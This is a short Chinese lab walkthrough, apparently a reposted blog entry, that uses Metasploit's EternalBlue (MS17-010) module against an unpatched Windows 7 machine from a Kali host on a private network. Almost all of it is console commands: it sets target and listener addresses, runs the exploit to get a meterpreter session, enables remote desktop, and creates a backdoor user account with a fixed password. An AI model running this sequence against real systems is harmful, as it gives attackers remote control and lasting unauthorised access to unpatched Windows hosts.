永恒之蓝-smb_ms17_010漏洞测试
作者:互联网
kali主机:10.158.1.110
windows7 pro:10.158.1.120
注:未打补丁
msf6 > use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue //调用攻击模块
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 10.158.1.120
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 10.158.1.110
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
meterpreter > run post/windows/manage/enable_rdp //启动远程桌面
meterpreter > run post/windows/manage/enable_rdp USERNAME=kddi PASSWORD=pwd@123 //创建用户
受害主机查看
标签:windows,010,exploit,ms17,msf6,smb 来源: https://www.cnblogs.com/networking/p/14669471.html